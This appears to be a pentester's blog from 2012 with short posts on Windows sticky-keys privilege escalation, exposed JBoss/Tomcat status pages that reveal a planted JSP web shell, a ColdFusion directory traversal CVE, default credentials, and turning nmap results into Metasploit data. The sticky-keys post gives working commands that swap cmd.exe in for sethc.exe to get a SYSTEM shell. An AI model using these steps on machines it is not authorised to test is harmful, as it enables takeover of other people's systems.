Monday, April 30, 2012

Privilege Escalation via "Sticky" Keys


This has been documented all over, but i like things to be on the blog so i can find them...

You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.

make a copy somewhere of the original on system sethc.exe

copy c:\windows\system32\sethc.exe c:\


cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe


copy cmd.exe into sethc.exe's place


copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe


or


cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe


Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing






it would probably be nice to sethc.exe back when you are done.
CG

Friday, April 27, 2012

From LOW to PWNED [3] JBoss/Tomcat server-status



Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [3] JBoss/Tomcat server-status

There have been some posts/exploits/modules on hitting up unprotected jboss and tomcat servers.

http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.html
http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
http://goohackle.com/jboss-security-vulnerability-jmx-management-console/

http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true



/manager/status/all



LOW?

This can be useful to find:


  • Lists of applications
  • Recent URL's accessed
    • sometimes with sessionids 
  • Find hidden services/apps
  • Enabled servlets
  • owned stuff :-)
Finding 0wned stuff is always fun let's see

Looking at the list of applications list one that doesnt look normal (zecmd)

Following that down leads us to zecmd.jsp that is a jsp shell


If you are interested in zecmd.jsp and jboss worm it comes from -->  this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf

thoughts?

-CG


CG

Monday, April 23, 2012

From LOW to PWNED [2] ColdFusion



Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [2] ColdFusion

Whhhhaaaat? ColdFusion?
  • Originally released in 1995 by Allaire
  • Motivation: make it easier to connect simple HTML pages to a database
  • Along the way became full Java
  • Latest version is ColdFusion 9 released in 2009
  • Most recent features focus on integration with other technologies, e.g. Flash, Flex, AIR, Exchange, MS Office, etc.
  • Frequent to see CF 7 - 9 on the web
  • Open Source CFML avalable as well
  • BlueDragon, Railo, Mura CMS
Background Reading:

http://carnal0wnage.attackresearch.com/2011/12/not-0wning-that-coldfusion-server-but.html
http://averagesecurityguy.info/2011/12/09/owning-a-coldfusion-server/
https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
https://media.blackhat.com/bh-us-10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf

LOW?


Two nice bugs exist that I don't think vuln scanners commonly check for


Locale traversal CVE: 2010-2861
coldfusion_locale_traversal.rb

great overview/walkthru here: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Vulnerable Versions:
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
ColdFusion 9?  Immunity reported yes, but Adobe fixed downloadable version of 9. so maaaaaaybe if old version of 9.

*no patches exist for 6 & 7 so if you see CF6 or CF7 its always vuln to the bug*



There's lots more to the ColdFusion story, enough that I recently gave a talk on it.
CG

Friday, April 20, 2012

From LOW to PWNED [1] Exposed Services and Admin Interfaces



Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. so first example is a VNC server with  no password. This gives us a HIGH severity finding

 The following is a VNC server with a password of "password"

see the problem? Same thing goes for SSH, Telnet, FTP, etc.  Don't forget about databases as well, MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.



Admin Interfaces:

Admin interfaces can be gold. the problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. this can be a hassle/problem/hard to do.

So to bring the "low" to it.  some random HTTP server gets you this in Nessus

Now, to be fair this could be totally accurate, but the point is you need to look at what is being served on this HTTP server, could be something could be nothing, no way to know unless you look.  Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:


  1. Nmap your range
  2. Import your nmap results into metasploit
  3. Use the db_ searches to pull out a list of hosts & ports
  4. With the magic of scripting languages make that list into an html page(s)
  5. Use linky to open all those links
Kinda goes like this:

after you have imported your nmap results, uses the services option.

If its populated you'll get a list or results like the below

Output that stuff to a CSV

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it


The above code will output an html file that you can open with linky
linky will open each link in a new tab allowing you a way to get eyes on each of those random HTTP(S) services.

You can now start intelligently trying default passwords or viewing exposed content.

Thoughts?

-CG

CG

Thursday, April 19, 2012

From LOW to PWNED [0] Intro


Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1.  We tend to have an over reliance on vulnerability scanners to tell us everything that is vulnerable.  To be honest I have been guilty of this myself.  Most of us probably have a for a variety of reasons, time, experience, level of effort required/paid for, etc.  This over reliance on scanners has lead to a "no highs" == "secure environment".  Most of us know this is not *always* the case and the point of the talk was to show some examples were medium and low vulnerabilities have led to a further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity its becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever).  This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean ever SSLv2 enabled should be full out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings cant be turned into something more.

5. Keep in a human in the mix.  Tools/scanner are great for automating tasks but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line, the scanner wont find all your ownable stuff, you need a person(s) to do this.


Thoughts?

-CG





CG

Wednesday, April 11, 2012

ColdFusion for Pentesters at SOURCE Boston


I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."


Like the other talks, i'll do the what it is, why you care (?), and some ways to go after it.  Hopefully useful/interesting.

Hope to see people there.

-CG

CG